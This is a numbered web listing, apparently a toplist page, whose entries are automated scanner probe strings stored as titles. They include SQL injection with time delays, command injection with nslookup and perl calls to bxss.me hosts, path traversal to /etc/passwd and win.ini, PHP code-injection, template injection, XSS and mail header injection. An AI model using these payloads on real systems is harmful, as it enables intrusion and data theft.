8. ../../../../../../../../../../../../../../windows/
1186
9. &echo igfekn$()\ cniina\nz^xyu||a #' &echo igfekn$
1186
10. echo dagqwg$()\ ycsutr\nz^xyu||a #' &echo dagqwg$(
1186
11. "+response.write(9336573*9441606)+"
1186
12. '+response.write(9336573*9441606)+'
1186
13. response.write(9336573*9441606)
1186
14. TzwSVsOw'"()&%JoIV(9879)
1186
15. insert-toplist.php
1186
16. TzwSVsOw"&&sleep(27*1000)*dnamrf&&"
1186
17. '.print(md5(31337)).'
1186
18. TzwSVsOw'||sleep(27*1000)*cosycu||'
1186
20. TzwSVsOw"||sleep(27*1000)*ebqjpg||"
1186
22. TzwSVsOw'&&sleep(27*1000)*sttzwf&&'
1186
23. ${@print(md5(31337))}\
1186
25. ';print(md5(31337));$a='
1186
27. ";print(md5(31337));$a="
1186
28. "+"A".concat(70-3).concat(22*4).concat(112).concat
1186
29. ${@print(md5(31337))}
1186
30. ".gethostbyname(lc("hitur"."vqvzfxuk01dd0.bxss.me.
1186
31. '+'A'.concat(70-3).concat(22*4).concat(118).concat
1186
32. ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))
1186
34. '.gethostbyname(lc('hitxa'.'sickhezga766e.bxss.me.
1186
35. TzwSVsOw
bcc:009247.495-3573.495.acab4.19345.2@bxs
1186
36. ;(nslookup hitknsbfsadaj10077.bxss.me||perl -e "ge
1186
37. `(nslookup hitjkguddmocz65047.bxss.me||perl -e "ge
1186
38. |(nslookup hitbyzfgstdbvd38c4.bxss.me||perl -e "ge
1186
39. &(nslookup hittqgvvtevwb14148.bxss.me||perl -e "ge
1186
40. to@example.com>
bcc:009247.495-3574.495.acab4.193
1186
41. &nslookup hitedlqrseixaf2bcd.bxss.me&'\"`0&nslooku
1186
42. $(nslookup hiteptbefwymo4e9f5.bxss.me||perl -e "ge
1186
44. (nslookup hitbcantbzbwg5b610.bxss.me||perl -e "get
1186
46. |echo lrcowq$()\ zkxevo\nz^xyu||a #' |echo lrcowq$
1186
47. file:///etc/passwd
1186
48. http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriyl
1186
50. ${9999366+9999261}
1186
54. ^(#$!@#$)(()))******
1186
55. dfb[[${98991*97996}]]xca
1186
56. dfb{{98991*97996}}xca
1186
57. 1}}"}}'}}1%>"%>'%>
1186
60. bfgx3428??z1??z2a?bcxhjl3428
1186
61. bfg5659<s1﹥s2ʺs3ʹhjl5659
1186
65. dfb__${98991*97996}__::.x
1186
66. TzwSVsOwJoIV(9687)
1186
68. TzwSVsOwJoIV(9379)
1186
69. TzwSVsOwJoIV(9111)
1186
70. TzwSVsOwG42DT[!+!]
1186
71. TzwSVsOwJoIV(9054)
1186
72. "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1186
74. -1 OR 2+426-426-1=0+0+0+1 --
1186
75. -1' OR 2+830-830-1=0+0+0+1 or 'gGfMazpK'='
1186
76. -1 OR 2+366-366-1=0+0+0+1
1186
77. -1' OR 2+505-505-1=0+0+0+1 --
1186
79. -1" OR 2+209-209-1=0+0+0+1 --
1186
80. if(now()=sysdate(),sleep(15),0)
1186
81. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1186
82. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1186
83. (select(0)from(select(sleep(15)))v)/*'+(select(0)f
1186
84. 1 waitfor delay '0:0:15' --
1186
85. 5ZUTGO0h'; waitfor delay '0:0:15' --
1186
86. RRzyClib' OR 714=(SELECT 714 FROM PG_SLEEP(15))--
1186
87. vSr2BzqY') OR 127=(SELECT 127 FROM PG_SLEEP(15))--
1186
88. s0r81GoV')) OR 520=(SELECT 520 FROM PG_SLEEP(15))-
1186
89. TzwSVsOw'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(
1186
104. /WEB-INF/web.xml
1186
105. Http://bxss.me/t/fit.txt
1186
106. /\../\../\../\../\../\../\../etc/passwd
1186
107. 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1186
108. http://bxss.me/t/fit.txt%3F.jpg
1186
109. C:\WINDOWS\system32\drivers\etc\hosts
1186
112. ../../../../../../../../../../windows/win.ini%00.j
1186
113. c:/windows/win.ini
1186
114. -1 OR 2+265-265-1=0+0+0+1 --
1186
115. /../../../../../../../../../../boot.ini
1186
117. -1 OR 2+687-687-1=0+0+0+1
1186
118. file:///etc/passwd
1186
119. response.write(9821925*9368370)
1186
120. ../../../../../../../../../../../../../../../proc/
1186
121. &(nslookup hitkivlxcndth506b1.bxss.me||perl -e "ge
1186
122. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
1186
123. |(nslookup hitjgedehqtgnb5798.bxss.me||perl -e "ge
1186
124. echo hvpklb$()\ bgqjwu\nz^xyu||a #' &echo hvpklb$(
1186
125. ../../../../../../../../../../etc/passwd%00.jpg
1186
126. `(nslookup hitsgtcxkpwtwaad02.bxss.me||perl -e "ge
1186
127. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
1186
128. ;(nslookup hitfpgabqlqsk17d1a.bxss.me||perl -e "ge
1186
130. &nslookup hitsxzwvolbfld4eee.bxss.me&'\"`0&nslooku
1186
131. '+response.write(9821925*9368370)+'
1186
132. &echo qnwshl$()\ tayvdu\nz^xyu||a #' &echo qnwshl$
1186
133. "+response.write(9821925*9368370)+"
1186
134. |echo mjubwj$()\ bdjklk\nz^xyu||a #' |echo mjubwj$
1186
135. ../../../../../../../../../../../../../../etc/pass
1186
136. (nslookup hithrgyqrxpmd088df.bxss.me||perl -e "get
1186
137. ../../../../../../../../../../../../../../windows/
1186
138. $(nslookup hitzvpezndoaya14c8.bxss.me||perl -e "ge
1186
139. file:///etc/passwd
1186
140. /../..//../..//../..//../..//../..//etc/passwd%00.
1186
141. .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1186
142. %0abcc:009247.495-4756.495.53dd7.19345.2@bxss.me
1186
143. /.././.././.././.././.././.././.././../etc/./passw
1186
144. ../..//../..//../..//../..//../..//../..//../..//.
1186
145. 12345'"\'\");|]*%00{%0d%0a%bf%27'????
1186
146. ../.../.././../.../.././../.../.././../.../.././..
1186
147. ../././../././../././../././../././../././../././.
1186
149. ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
1186
150. ${9999760+9999753}
1186
151. invalid../../../../../../../../../../etc/passwd/./
1186
152. http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriyl
1186
155. to@example.com>%0d%0abcc:009247.495-4757.495.53dd7
1186
156. '.gethostbyname(lc('hituk'.'cogdgyis4dbed.bxss.me.
1186
157. ^(#$!@#$)(()))******
1186
159. /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1186
160. bxss.me/t/xss.html?%00
1186
161. ';print(md5(31337));$a='
1186
162. ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5c
1186
163. '+'A'.concat(70-3).concat(22*4).concat(107).concat
1186
166. ../..//../..//../..//../..//../..//../..//../..//.
1186
167. '.print(md5(31337)).'
1186
168. -1" OR 2+290-290-1=0+0+0+1 --
1186
169. ${@print(md5(31337))}\
1186
170. -1' OR 2+727-727-1=0+0+0+1 or 'KzzhweJf'='
1186
171. ../.../.././../.../.././../.../.././../.../.././..
1186
172. HttP://bxss.me/t/xss.html?%00
1186
173. ${@print(md5(31337))}
1186
174. unexisting/../../../../../../../../../../windows/w
1186
175. ".gethostbyname(lc("hitbm"."jplcgehta519c.bxss.me.
1186
176. ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))
1186
177. "+"A".concat(70-3).concat(22*4).concat(105).concat
1186
179. ";print(md5(31337));$a="
1186
183. -1' OR 2+33-33-1=0+0+0+1 --
1186
184. '"()&%THdp(9932)
1186
185. 1'"()&%THdp(9300)
1186
187. ..\..\..\..\..\..\..\..\windows\win.ini
1186
188. %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c
1186
189. if(now()=sysdate(),sleep(15),0)
1186
190. bfg3411%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3411
1186
191. dfb__${98991*97996}__::.x
1186
192. dfb[[${98991*97996}]]xca
1186
193. dfb{{98991*97996}}xca
1186
194. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1186
196. 1}}"}}'}}1%>"%>'%>
1186
198. bfgx8656%C0%BEz1%C0%BCz2a%90bcxhjl8656
1186
201. 1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%
1186
202. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1186
207. (select(0)from(select(sleep(15)))v)/*'+(select(0)f
1186
210. "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1186
216. %31%3C%53%63%52%69%50%74%20%3E%54%48%64%70%289322%
1186
217. -1; waitfor delay '0:0:15' --
1186
221. 1<ScRiPt>THdp(9910)</sCripT>
1186
222. 1\u003CScRiPt\THdp(9861)\u003C/sCripT\u003E
1186
224. 1}body{zzz:Expre/**/SSion(THdp(9757))}
1186
226. -1); waitfor delay '0:0:15' --
1186
228. 1P3EUa
THdp(9586)
1186
230. 1 waitfor delay '0:0:15' --
1186
233. NCScFcEz'; waitfor delay '0:0:15' --
1186
234. -5 OR 419=(SELECT 419 FROM PG_SLEEP(15))--
1186
235. -5) OR 520=(SELECT 520 FROM PG_SLEEP(15))--
1186
236. -1)) OR 377=(SELECT 377 FROM PG_SLEEP(15))--
1186
237. 2heeUqVY' OR 536=(SELECT 536 FROM PG_SLEEP(15))--
1186
238. C7LoBr3F') OR 717=(SELECT 717 FROM PG_SLEEP(15))--
1186
239. 0LGkeMVx')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-
1186
240. 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(
1186
241. 1�????%2527%2522
1186
243. 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CH
1186
246. to@example.com>
bcc:009247.495-3501.495.acab4.193
1086
247. TzwSVsOw
bcc:009247.495-3500.495.acab4.19345.2@bxs
1086
248. &(nslookup hitjupolrdqug8ff91.bxss.me||perl -e "ge
1086
249. file:///etc/passwd
1086
251. |(nslookup hitltnkbxbuive83f2.bxss.me||perl -e "ge
1086
253. ;(nslookup hitgzeayyciuj54cb7.bxss.me||perl -e "ge
1086
254. `(nslookup hitokdshqsjsrcefd3.bxss.me||perl -e "ge
1086
255. ../../../../../../../../../../../../../../windows/
1086
256. &nslookup hittvwyavozeg433cf.bxss.me&'\"`0&nslooku
1086
257. response.write(9560620*9576806)
1086
258. echo bahpvs$()\ apbypn\nz^xyu||a #' &echo bahpvs$(
1086
259. |echo gzlcuc$()\ wjdcvw\nz^xyu||a #' |echo gzlcuc$
1086
260. '+response.write(9560620*9576806)+'
1086
261. &echo lvqscz$()\ eiffjp\nz^xyu||a #' &echo lvqscz$
1086
262. "+response.write(9560620*9576806)+"
1086
263. (nslookup hithjedsbjzad34899.bxss.me||perl -e "get
1086
264. $(nslookup hitsnsjmsrpis28a48.bxss.me||perl -e "ge
1086
265. '.gethostbyname(lc('hitlk'.'dskxgtkcd7c48.bxss.me.
1086
266. ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))
1086
267. ".gethostbyname(lc("hitjv"."wpjclddg1b9fd.bxss.me.
1086
268. ";print(md5(31337));$a="
1086
269. ${@print(md5(31337))}
1086
270. TzwSVsOw"&&sleep(27*1000)*twdnyo&&"
1086
271. TzwSVsOw"||sleep(27*1000)*vaxinm||"
1086
272. '.print(md5(31337)).'
1086
273. TzwSVsOw'||sleep(27*1000)*gglobz||'
1086
274. ${@print(md5(31337))}\
1086
278. http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriyl
1086
281. ';print(md5(31337));$a='
1086
284. TzwSVsOw'&&sleep(27*1000)*cacbft&&'
1086
285. ^(#$!@#$)(()))******
1086
287. ${9999468+10000019}
1086
288. '+'A'.concat(70-3).concat(22*4).concat(113).concat
1086
289. "+"A".concat(70-3).concat(22*4).concat(113).concat
1086
292. insert-toplist.php
1086
294. 1}}"}}'}}1%>"%>'%>
1086
297. bfgx6740??z1??z2a?bcxhjl6740
1086
298. bfg8397<s1﹥s2ʺs3ʹhjl8397
1086
300. '"()&%fKRK(9364)
1086
301. TzwSVsOw'"()&%fKRK(9918)
1086
303. TzwSVsOwfKRK(9840)
1086
304. TzwSVsOwfKRK(9218)
1086
305. TzwSVsOwfKRK(9134)
1086
307. TzwSVsOwRVIAJ[!+!]
1086
308. "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1086
309. dfb__${98991*97996}__::.x
1086
310. dfb[[${98991*97996}]]xca
1086
311. dfb{{98991*97996}}xca
1086
312. TzwSVsOwfKRK(9897)
1086
316. -1" OR 2+702-702-1=0+0+0+1 --
1086
317. -1' OR 2+924-924-1=0+0+0+1 or 'arsTAFre'='
1086
318. -1' OR 2+692-692-1=0+0+0+1 --
1086
319. -1 OR 2+952-952-1=0+0+0+1 --
1086
320. -1 OR 2+15-15-1=0+0+0+1
1086
321. if(now()=sysdate(),sleep(15),0)
1086
322. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1086
323. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1086
327. (select(0)from(select(sleep(15)))v)/*'+(select(0)f
1086
328. 1 waitfor delay '0:0:15' --
1086
329. sekW5hjJ'; waitfor delay '0:0:15' --
1086
330. QOH5Ljpy' OR 760=(SELECT 760 FROM PG_SLEEP(15))--
1086
331. b7psbqZX') OR 531=(SELECT 531 FROM PG_SLEEP(15))--
1086
332. cIRN5oDl')) OR 424=(SELECT 424 FROM PG_SLEEP(15))-
1086
337. TzwSVsOw'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(
1086
340. response.write(9184591*9779206)
1086
341. |(nslookup hitddcqipmwge83fcd.bxss.me||perl -e "ge
1086
342. `(nslookup hitkazslqngyz205f5.bxss.me||perl -e "ge
1086
343. ;(nslookup hitmpzdsphurv25a13.bxss.me||perl -e "ge
1086
344. ../../../../../../../../../../../../../../etc/pass
1086
345. &(nslookup hitsbarrnucri2eefa.bxss.me||perl -e "ge
1086
346. &nslookup hitpflkvfznbube3ee.bxss.me&'\"`0&nslooku
1086
347. $(nslookup hitecvgeyhkiybfcb4.bxss.me||perl -e "ge
1086
348. '+response.write(9184591*9779206)+'
1086
349. |echo akgbrc$()\ kslrci\nz^xyu||a #' |echo akgbrc$
1086
350. &echo jntwwi$()\ rsnhpv\nz^xyu||a #' &echo jntwwi$
1086
351. echo mygtdv$()\ bdqaxg\nz^xyu||a #' &echo mygtdv$(
1086
352. "+response.write(9184591*9779206)+"
1086
353. ../../../../../../../../../../../../../../windows/
1086
354. file:///etc/passwd
1086
355. ../../../../../../../../../../../../../../../proc/
1086
356. (nslookup hitonjwfiisfq0414a.bxss.me||perl -e "get
1086
357. /WEB-INF/web.xml
1086
358. file:///etc/passwd
1086
359. ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
1086
360. ../.../.././../.../.././../.../.././../.../.././..
1086
361. ../..//../..//../..//../..//../..//../..//../..//.
1086
362. /.././.././.././.././.././.././.././../etc/./passw
1086
363. /\../\../\../\../\../\../\../etc/passwd
1086
366. .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1086
367. /../..//../..//../..//../..//../..//etc/passwd%00.
1086
368. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
1086
369. ../../../../../../../../../../etc/passwd%00.jpg
1086
370. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
1086
371. ../././../././../././../././../././../././../././.
1086
372. invalid../../../../../../../../../../etc/passwd/./
1086
373. http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriyl
1086
374. ../.../.././../.../.././../.../.././../.../.././..
1086
375. ../..//../..//../..//../..//../..//../..//../..//.
1086
376. /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1086
377. ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5c
1086
378. ..\..\..\..\..\..\..\..\windows\win.ini
1086
379. %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c
1086
380. /../../../../../../../../../../boot.ini
1086
382. ../../../../../../../../../../windows/win.ini%00.j
1086
384. C:\WINDOWS\system32\drivers\etc\hosts
1086
385. unexisting/../../../../../../../../../../windows/w
1086
386. Http://bxss.me/t/fit.txt
1086
388. 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1086
389. c:/windows/win.ini
1086
390. ${10000336+9999039}
1086
392. 12345'"\'\");|]*%00{%0d%0a%bf%27'????
1086
393. to@example.com>%0d%0abcc:009247.495-4428.495.53dd7
1086
394. %0abcc:009247.495-4427.495.53dd7.19345.2@bxss.me
1086
396. http://bxss.me/t/fit.txt%3F.jpg
1086
397. bxss.me/t/xss.html?%00
1086
398. HttP://bxss.me/t/xss.html?%00
1086
399. "+"A".concat(70-3).concat(22*4).concat(119).concat
1086
400. '+'A'.concat(70-3).concat(22*4).concat(109).concat
1086
403. '.print(md5(31337)).'
1086
404. ${@print(md5(31337))}\
1086
405. ${@print(md5(31337))}
1086
406. ";print(md5(31337));$a="
1086
407. ';print(md5(31337));$a='
1086
408. ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))
1086
409. ".gethostbyname(lc("hitii"."ncdrchdyd4ec8.bxss.me.
1086
410. '.gethostbyname(lc('hitfx'.'kdbesvra92352.bxss.me.
1086
414. ^(#$!@#$)(()))******
1086
417. 1'"()&%2ZcM(9545)
1086
418. '"()&%2ZcM(9482)
1086
419. bfgx8439%C0%BEz1%C0%BCz2a%90bcxhjl8439
1086
420. dfb__${98991*97996}__::.x
1086
423. "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1086
424. dfb[[${98991*97996}]]xca
1086
425. bfg5902%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5902
1086
426. 1}}"}}'}}1%>"%>'%>
1086
429. dfb{{98991*97996}}xca
1086
440. 1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%
1086
443. %31%3C%53%63%52%69%50%74%20%3E%32%5A%63%4D%289722%
1086
444. 1\u003CScRiPt\2ZcM(9995)\u003C/sCripT\u003E
1086
447. 12gKTF
2ZcM(9108)
1086
448. 1}body{zzz:Expre/**/SSion(2ZcM(9410))}
1086
452. 1<ScRiPt>2ZcM(9665)</sCripT>
1086
458. -1 OR 2+561-561-1=0+0+0+1 --
1086
459. -1 OR 2+152-152-1=0+0+0+1
1086
460. -1' OR 2+585-585-1=0+0+0+1 --
1086
461. -1' OR 2+19-19-1=0+0+0+1 or 'izRBJ7Es'='
1086
462. -1" OR 2+165-165-1=0+0+0+1 --
1086
463. if(now()=sysdate(),sleep(15),0)
1086
464. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1086
465. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1086
466. (select(0)from(select(sleep(15)))v)/*'+(select(0)f
1086
467. -1; waitfor delay '0:0:15' --
1086
468. -1); waitfor delay '0:0:15' --
1086
469. 1 waitfor delay '0:0:15' --
1086
470. 6jCFy1F4'; waitfor delay '0:0:15' --
1086
471. -5 OR 621=(SELECT 621 FROM PG_SLEEP(15))--
1086
472. -5) OR 70=(SELECT 70 FROM PG_SLEEP(15))--
1086
473. -1)) OR 712=(SELECT 712 FROM PG_SLEEP(15))--
1086
474. gsJit2yn' OR 274=(SELECT 274 FROM PG_SLEEP(15))--
1086
475. a0cCeAlA') OR 921=(SELECT 921 FROM PG_SLEEP(15))--
1086
476. EyUrNJ4w')) OR 661=(SELECT 661 FROM PG_SLEEP(15))-
1086
477. 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(
1086
478. 1�????%2527%2522
1086
479. 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CH
1086
489. echo xhzrhp$()\ gdyzvg\nz^xyu||a #' &echo xhzrhp$(
543
490. "+response.write(9589885*9150928)+"
543
491. '+response.write(9589885*9150928)+'
543
492. response.write(9589885*9150928)
543
494. http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriyl
543
500. ^(#$!@#$)(()))******
543
501. '.gethostbyname(lc('hitlj'.'zbtsyirhb0578.bxss.me.
543
502. ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))
543
503. TzwSVsOw'&&sleep(27*1000)*elmyam&&'
543
504. ';print(md5(31337));$a='
543
505. TzwSVsOw"&&sleep(27*1000)*eflyzq&&"
543
506. ".gethostbyname(lc("hitpq"."bginxemee1d61.bxss.me.
543
507. ${9999750+9999499}
543
509. ;(nslookup hitpxrxpdawrf9c4d5.bxss.me||perl -e "ge
543
510. &echo yudrye$()\ gmkwcz\nz^xyu||a #' &echo yudrye$
543
511. |echo jcdrdw$()\ unxuil\nz^xyu||a #' |echo jcdrdw$
543
512. file:///etc/passwd
543
513. (nslookup hitwiyraxvjfs383b6.bxss.me||perl -e "get
543
514. $(nslookup hitfyzgnxuouue6d04.bxss.me||perl -e "ge
543
517. &nslookup hituzcjnqxbusdac9c.bxss.me&'\"`0&nslooku
543
518. &(nslookup hitfmzuhyrpkj42914.bxss.me||perl -e "ge
543
519. TzwSVsOw
bcc:009247.495-3494.495.acab4.19345.2@bxs
543
520. |(nslookup hitfsbxwaufkj73db5.bxss.me||perl -e "ge
543
521. to@example.com>
bcc:009247.495-3495.495.acab4.193
543
522. `(nslookup hitaytiykrpiq92869.bxss.me||perl -e "ge
543
523. ../../../../../../../../../../../../../../windows/
543
524. TzwSVsOw'"()&%ZMnh(9940)
543
527. bfg1913<s1﹥s2ʺs3ʹhjl1913
543
528. bfgx4940??z1??z2a?bcxhjl4940
543
533. insert-toplist.php
543
534. ${@print(md5(31337))}\
543
535. TzwSVsOw'||sleep(27*1000)*zvhcfm||'
543
536. ";print(md5(31337));$a="
543
537. ${@print(md5(31337))}
543
538. TzwSVsOw"||sleep(27*1000)*bfgebj||"
543
539. "+"A".concat(70-3).concat(22*4).concat(110).concat
543
540. '+'A'.concat(70-3).concat(22*4).concat(111).concat
543
541. '.print(md5(31337)).'
543
542. TzwSVsOwZMnh(9300)
543
543. TzwSVsOwZMnh(9640)
543
544. TzwSVsOwZMnh(9850)
543
545. TzwSVsOwZMnh(9649)
543
546. "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
543
547. dfb__${98991*97996}__::.x
543
548. dfb{{98991*97996}}xca
543
549. 1}}"}}'}}1%>"%>'%>
543
551. TzwSVsOwWCOIP[!+!]
543
552. dfb[[${98991*97996}]]xca
543
557. -1 OR 2+71-71-1=0+0+0+1 --
543
558. -1 OR 2+365-365-1=0+0+0+1
543
559. -1' OR 2+452-452-1=0+0+0+1 --
543
560. -1' OR 2+204-204-1=0+0+0+1 or 'veMHNcDk'='
543
561. -1" OR 2+130-130-1=0+0+0+1 --
543
562. if(now()=sysdate(),sleep(15),0)
543
563. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
543
564. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
543
571. (select(0)from(select(sleep(15)))v)/*'+(select(0)f
543
572. 1 waitfor delay '0:0:15' --
543
573. X9A6szrI'; waitfor delay '0:0:15' --
543
574. S7Ut6k9w' OR 151=(SELECT 151 FROM PG_SLEEP(15))--
543
575. JuUKRUSD') OR 27=(SELECT 27 FROM PG_SLEEP(15))--
543
576. 72TNRQ4U')) OR 312=(SELECT 312 FROM PG_SLEEP(15))-
543
577. TzwSVsOw'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(
543
580. TzwSVsOw'"()&%yiHn(9496)
543
582. bfg6407<s1﹥s2ʺs3ʹhjl6407
543
583. bfgx10987??z1??z2a?bcxhjl10987
543
586. 1}}"}}'}}1%>"%>'%>
543
587. TzwSVsOwyiHn(9322)
543
588. TzwSVsOwCLV2H[!+!]
543
589. "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
543
590. dfb__${98991*97996}__::.x
543
591. dfb{{98991*97996}}xca
543
592. dfb[[${98991*97996}]]xca
543
594. TzwSVsOwyiHn(9264)
543
595. TzwSVsOwyiHn(9209)
543
596. TzwSVsOwyiHn(9435)
543
604. response.write(9989505*9380920)
543
605. &nslookup hitshxhrsnokbe8bf2.bxss.me&'\"`0&nslooku
543
606. ../../../../../../../../../../../../../../windows/
543
607. &(nslookup hitnjyzwssksjc7384.bxss.me||perl -e "ge
543
608. file:///etc/passwd
543
609. ../../../../../../../../../../../../../../../proc/
543
610. |(nslookup hitbkemmahdbc4eb9d.bxss.me||perl -e "ge
543
611. ../../../../../../../../../../../../../../etc/pass
543
612. $(nslookup hitwdmuvvpwyl2ca0f.bxss.me||perl -e "ge
543
614. (nslookup hitrmcotcywnl6c8f9.bxss.me||perl -e "get
543
615. |echo glsrvw$()\ zcpcdk\nz^xyu||a #' |echo glsrvw$
543
616. &echo hievmp$()\ weqkya\nz^xyu||a #' &echo hievmp$
543
617. echo rceflx$()\ bkvzmw\nz^xyu||a #' &echo rceflx$(
543
618. "+response.write(9989505*9380920)+"
543
619. '+response.write(9989505*9380920)+'
543
620. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
543
621. `(nslookup hitmrdsiycscr72667.bxss.me||perl -e "ge
543
622. ../../../../../../../../../../etc/passwd%00.jpg
543
623. file:///etc/passwd
543
624. invalid../../../../../../../../../../etc/passwd/./
543
625. ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
543
626. ../././../././../././../././../././../././../././.
543
627. ../.../.././../.../.././../.../.././../.../.././..
543
628. ../..//../..//../..//../..//../..//../..//../..//.
543
629. /.././.././.././.././.././.././.././../etc/./passw
543
631. ;(nslookup hitnzcneghfpm6c7dd.bxss.me||perl -e "ge
543
632. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
543
633. /../..//../..//../..//../..//../..//etc/passwd%00.
543
634. .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
543
638. unexisting/../../../../../../../../../../windows/w
543
639. ${10000330+9999490}
543
640. ../.../.././../.../.././../.../.././../.../.././..
543
641. Http://bxss.me/t/fit.txt
543
642. ../..//../..//../..//../..//../..//../..//../..//.
543
643. /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
543
645. ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5c
543
646. http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriyl
543
647. 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
543
648. ".gethostbyname(lc("hitih"."sckdlozv27400.bxss.me.
543
649. ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))
543
650. '.gethostbyname(lc('hitba'.'doqwliug5ea20.bxss.me.
543
651. ^(#$!@#$)(()))******
543
655. c:/windows/win.ini
543
657. http://bxss.me/t/fit.txt%3F.jpg
543
658. ..\..\..\..\..\..\..\..\windows\win.ini
543
659. ../../../../../../../../../../windows/win.ini%00.j
543
660. %0abcc:009247.495-4375.495.53dd7.19345.2@bxss.me
543
661. /../../../../../../../../../../boot.ini
543
662. C:\WINDOWS\system32\drivers\etc\hosts
543
663. 12345'"\'\");|]*%00{%0d%0a%bf%27'????
543
665. to@example.com>%0d%0abcc:009247.495-4376.495.53dd7
543
666. /\../\../\../\../\../\../\../etc/passwd
543
667. %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c
543
668. ${@print(md5(31337))}\
543
669. HttP://bxss.me/t/xss.html?%00
543
670. '.print(md5(31337)).'
543
671. ${@print(md5(31337))}
543
672. ";print(md5(31337));$a="
543
673. ';print(md5(31337));$a='
543
674. "+"A".concat(70-3).concat(22*4).concat(99).concat(
543
675. bxss.me/t/xss.html?%00
543
678. bfgx9640%C0%BEz1%C0%BCz2a%90bcxhjl9640
543
679. bfg4811%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl4811
543
682. 1'"()&%2dV3(9239)
543
685. '+'A'.concat(70-3).concat(22*4).concat(115).concat
543
686. dfb__${98991*97996}__::.x
543
687. dfb[[${98991*97996}]]xca
543
689. 1}}"}}'}}1%>"%>'%>
543
691. "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
543
693. 1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%
543
694. dfb{{98991*97996}}xca
543
700. %31%3C%53%63%52%69%50%74%20%3E%32%64%56%33%289908%
543
707. 1}body{zzz:Expre/**/SSion(2dV3(9456))}
543
711. 1k4c7x
2dV3(9946)
543
713. 1\u003CScRiPt\2dV3(9807)\u003C/sCripT\u003E
543
715. 1<ScRiPt>2dV3(9527)</sCripT>
543
725. -1 OR 2+791-791-1=0+0+0+1 --
543
726. -1" OR 2+895-895-1=0+0+0+1 --
543
727. -1' OR 2+558-558-1=0+0+0+1 or 'GLmby5Yi'='
543
728. -1' OR 2+594-594-1=0+0+0+1 --
543
729. -1 OR 2+871-871-1=0+0+0+1
543
731. if(now()=sysdate(),sleep(15),0)
543
732. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
543
733. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
543
734. (select(0)from(select(sleep(15)))v)/*'+(select(0)f
543
735. -1; waitfor delay '0:0:15' --
543
736. -1); waitfor delay '0:0:15' --
543
